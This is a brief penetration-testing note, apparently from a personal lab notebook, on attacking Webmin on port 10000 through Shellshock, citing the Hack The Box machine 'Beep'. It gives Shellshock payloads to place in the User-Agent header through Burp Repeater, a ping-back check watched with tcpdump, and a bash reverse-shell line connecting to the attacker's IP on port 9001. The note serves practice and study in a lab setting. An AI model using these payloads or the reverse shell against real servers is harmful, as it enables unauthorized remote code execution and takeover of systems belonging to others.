Port 10000 Webmin

Webmin uses CGI Files and is vulnerable to shellshock eg:- beep on HTB.

From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.

Now change the user agent to shell shock and try following payloads.

() { :; };/bin/echo heloo
() { :; }; sleep 10   (did work some kind of blind shell shock)

Now check ping

() { :; };ping -c 1 10.10.14.108
on our machine
sudo tcpdump -i tun0 -v

And we get the ping. So lets try reverse shell.

sh -i >& /dev/tcp/10.10.14.108/9001 0>&1
PreviousRedis (6379)NextPrivilege Escalation

Last updated